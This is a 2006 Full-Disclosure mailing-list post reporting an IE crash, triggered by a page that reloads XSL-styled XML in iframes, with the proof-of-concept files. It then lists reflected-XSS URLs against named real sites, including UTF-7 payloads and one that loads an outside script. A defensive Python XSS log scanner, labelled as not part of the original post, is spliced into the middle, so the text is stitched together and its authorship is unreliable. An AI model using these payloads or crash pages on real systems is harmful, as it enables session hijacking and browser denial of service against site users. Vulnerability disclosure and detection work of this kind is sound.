[Full-disclosure] bugs
- To: full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: [Full-disclosure] bugs
- From: "Thomas Pollet" <thomas.pollet@xxxxxxxxx>
- Date: Sun, 6 Aug 2006 11:48:18 +0200
Hi,
I have found IE crashing when refreshing an iframe containing an XML file
with an XSL stylesheet (it takes a while to crash).
I used this html:
---------------------------------
<html>
<head>
<script language="javaScript">
function refresh() {
frames[0].window.location.reload();
setTimeout("refresh();", 20);
}
</script>
</head>
<body><iframe src="input.xml"></iframe>
<script>
refresh();
</script>
</body>
</html>
----------------------------------
input.xml calls an XSL stylesheet (cf. attachment):
<?xml version="1.0"?>
<?xml-stylesheet type="text/xsl" href="style2.xsl"?>
----------------------------------
w2k:
msxml3.dll:69B76B61 mov eax, [esi]
msxml3.dll:69B76B63 mov ecx, esi
msxml3.dll:69B76B65 call dword ptr [eax+48h]
with esi=0
MSHTML.DLL:637840E8 test byte ptr [eax+44Dh], 20h
with eax=0
xp:
msxml3.dll:74992156 8B43 14 MOV EAX,DWORD PTR DS:[EBX+14]
EBX=0
These seem like null pointer derefs.
The weird thing is that it crashes at different addresses; can somebody shed some light on
why this is?
obligatory xss:
http://search.oracle.com/search/search?keyword=%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&start=1&nodeid=&fid=&showSimilarDoc=true&group=Allsecure
search, lol?
oreilly.com: search powered by
http://promosearch.atomz.com/search/promosearch?query=%27%3B+--%3E%3C%2Fscript%3E+%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&sp-q=%27%3B+--%3E%3C%2Fscript%3E+%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&sp-a=sp1000a5a9&sp-f=ISO-8859-1&sp-t=general&sp-x-1=cat&sp-q-1=&sp-x-2=cat2&sp-q-2=&sp-c=25&sp-p=all&sp-k=Articles%7CBooks%7CConferences%7COther%7CWeblogs&c=&p=
http://www.altavista.com/web/results?itag=ody&q=%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&kgs=1&kls=0
http://audience.cnn.com/services/cnn/memberservices/member_register.jsp?pid=%22%3E%3Cscript%3Ealert(1)%3C/script%3Ey00&source=cnn&url=http%3A%2F%2Faudience.cnn.com%2Fservices%2Fcnn%2Fmemberservices%2Fregwall%2Fmember_profile.jsp%3Fsource%3Dcnn
http://www.ask.com/web?q=%2BADw-%2Ftitle%2BAD4-%2BADw-SCRIPT%2BAD4-alert%28%27XSS%27%29%3B%2BADw-%2FSCRIPT%2BAD4-&qsrc=1&o=333&l=dir
http://search.amd.com/query.html?col=idx1&qt=amd+%22%3E+%3Cscript%3E+alert%281%29+%3C%2Fscript%3E&charset=iso-8859-1&qp=url%3A%2Fus-en%2F+url%3A%2Fsg-en%2F+url%3A%2Fepd%2F&qs=%7C+language%3Aen&la=en&lap=en&qm=1&tqmhak=0
http://www.amazon.com/s/ref=nb_ss_gw/103-7930143-9476650?ie=UTF-8&url=search-alias%3Daps&field-keywords=%2BADw-SCRIPT%2BAD4-alert%28%27XSS%27%29%3B%2BADw-%2FSCRIPT%2BAD4-&Go.x=11&Go.y=10
http://search.hp.com/query.html?charset=iso-8859-1&la=en&hpvc=sitewide&qs=&nh=10&lk=1&rf=0&uf=1&st=1&qt=hp+%27%22y00--%3E%3C%2Fscript%3E%3Cscript+src%3Dhttp%3A%2F%2Fyoufucktard.com%2Fxss.js%3E&submitsearch.x=0&submitsearch.y=0
http://us.mcafee.com/virusInfo/ : enter the following in the virus search (use the POST
form for the exploit):
"><script>alert(1)</script>
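As an added example (not part of Thomas's post or any of the sites named), a defender-side check that scans request log lines for the kind of reflected-XSS probes listed above: it URL-decodes each query parameter and also tries a UTF-7 interpretation, since the `+ADw-SCRIPT+AD4-` form used against ask.com and amazon.com only becomes `<SCRIPT>` once a browser sniffs the response as UTF-7. The log lines and the `suspicious_params`/`scan_log` names are constructed for this example.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

# Markers a search term should never contain once decoded: a break-out of
# <title> (the search.oracle.com / altavista probes) or a script tag.
TAG_RE = re.compile(r"<\s*/?\s*(script|title|iframe|img|svg)\b", re.I)

def decodings(value: str):
    """Yield the candidate interpretations of one already-unquoted value."""
    yield value
    # The client may have encoded the payload twice.
    yield unquote_plus(value)
    # UTF-7: '+ADw-' is '<' and '+AD4-' is '>'. A response with no explicit
    # charset can be sniffed as UTF-7, so this form bypasses '<' filtering.
    if "+" in value:
        try:
            yield value.encode("ascii").decode("utf-7")
        except (UnicodeEncodeError, UnicodeDecodeError):
            pass

def suspicious_params(url: str) -> dict:
    """Return {param: decoded_value} for every query parameter that looks
    like an HTML injection attempt; {} when the request is clean."""
    hits = {}
    for name, raw in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        for cand in decodings(raw):
            if TAG_RE.search(cand):
                hits[name] = cand
                break
    return hits

# Constructed sample log lines (request-line only), shaped like the probes
# in the post: a </title> break-out, a UTF-7 payload, and a benign search.
SAMPLE_LOG = [
    "GET /search/search?keyword=%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&start=1",
    "GET /web?q=%2BADw-SCRIPT%2BAD4-alert%28%27XSS%27%29%3B%2BADw-%2FSCRIPT%2BAD4-&qsrc=1",
    "GET /search?q=xsl+stylesheet+crash&page=2",
]

def scan_log(lines):
    """Return (line, hits) pairs for every log line that carries a probe."""
    flagged = []
    for line in lines:
        path = line.split(" ", 2)[1]          # method, path, [version]
        hits = suspicious_params("http://host" + path)
        if hits:
            flagged.append((line, hits))
    return flagged

if __name__ == "__main__":
    for line, hits in scan_log(SAMPLE_LOG):
        print(line, "->", hits)
```

The fix on the server side is the same in every case: declare the response charset explicitly and HTML-escape the reflected term for the context it lands in (a `<title>` body, an attribute value, or a script block each need different escaping).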
cheers,
Thomas
----------------------------------
input.xml:
<?xml version="1.0"?>
<?xml-stylesheet type="text/xsl" href="style2.xsl"?>
<devguru_staff>
<programmer>
<name>Bugs Bunny</name>
<dob>03/21/1970</dob>
<age>31</age>
<address>4895 Wabbit Hole Road</address>
<phone>865-111-1111</phone>
</programmer>
<programmer>
<name>Daisy Duck</name>
<dob>08/09/1949</dob>
<age>51</age>
<address>748 Golden Pond</address>
<phone>865-222-2222</phone>
</programmer>
<programmer>
<name>Minnie Mouse</name>
<dob>04/13/1977</dob>
<age>24</age>
<address>4064 Cheese Factory Blvd</address>
<phone>865-333-3333</phone>
</programmer>
<programmer>
<name>Pluto</name>
<dob>07/04/1979</dob>
<age>21</age>
<address>414 Dog Lane</address>
<phone>865-333-3333</phone>
</programmer>
<programmer>
<name>Porky Pig</name>
<dob>11/30/1956</dob>
<age>44</age>
<address>555 Mud Pit Pike</address>
<phone>865-444-4444</phone>
</programmer>
<programmer>
<name>Road Runner</name>
<dob>01/19/1953</dob>
<age>48</age>
<address>135 Desert View Street</address>
<phone>none</phone>
</programmer>
</devguru_staff>
----------------------------------
style2.xsl:
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
<xsl:template match="/">
<html>
<body>
<xsl:for-each select="devguru_staff/programmer">
<div>
NAME: <xsl:value-of select="name" />
<br />
DOB: <xsl:value-of select="dob" />
<br />
AGE: <xsl:value-of select="age" />
<br />
ADDRESS: <xsl:value-of select="address" />
<br />
PHONE: <xsl:value-of select="phone" />
<hr />
</div>
</xsl:for-each>
</body>
</html>
</xsl:template>
</xsl:stylesheet>
----------------------------------
<html>
<head>
<script language="javaScript">
function refresh() {
var i = 0;
while (frames[i])
frames[i++].window.location.reload();
setTimeout("refresh();", 10);
}
</script>
</head>
<body>
<iframe src="input.xml"></iframe>
<iframe src="input.xml"></iframe>
<iframe src="input.xml"></iframe><iframe src="input.xml"></iframe>
<iframe src="input.xml"></iframe>
<iframe src="input.xml"></iframe><iframe src="input.xml"></iframe>
<iframe src="input.xml"></iframe>
<iframe src="input.xml"></iframe><iframe src="input.xml"></iframe>
<iframe src="input.xml"></iframe>
<iframe src="input.xml"></iframe><iframe src="input.xml"></iframe>
<iframe src="input.xml"></iframe>
<iframe src="input.xml"></iframe><iframe src="input.xml"></iframe>
<iframe src="input.xml"></iframe>
<iframe src="input.xml"></iframe><iframe src="input.xml"></iframe>
<iframe src="input.xml"></iframe>
<iframe src="input.xml"></iframe><iframe src="input.xml"></iframe>
<iframe src="input.xml"></iframe>
<iframe src="input.xml"></iframe><iframe src="input.xml"></iframe>
<iframe src="input.xml"></iframe>
<iframe src="input.xml"></iframe><iframe src="input.xml"></iframe>
<iframe src="input.xml"></iframe>
<iframe src="input.xml"></iframe><iframe src="input.xml"></iframe>
<iframe src="input.xml"></iframe>
<iframe src="input.xml"></iframe><iframe src="input.xml"></iframe>
<iframe src="input.xml"></iframe>
<iframe src="input.xml"></iframe><iframe src="input.xml"></iframe>
<iframe src="input.xml"></iframe>
<iframe src="input.xml"></iframe><iframe src="input.xml"></iframe>
<iframe src="input.xml"></iframe>
<iframe src="input.xml"></iframe><iframe src="input.xml"></iframe>
<iframe src="input.xml"></iframe>
<iframe src="input.xml"></iframe><iframe src="input.xml"></iframe>
<iframe src="input.xml"></iframe>
<iframe src="input.xml"></iframe>
<input type="button" onclick="refresh()" value="Test" />
</body>
</html>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/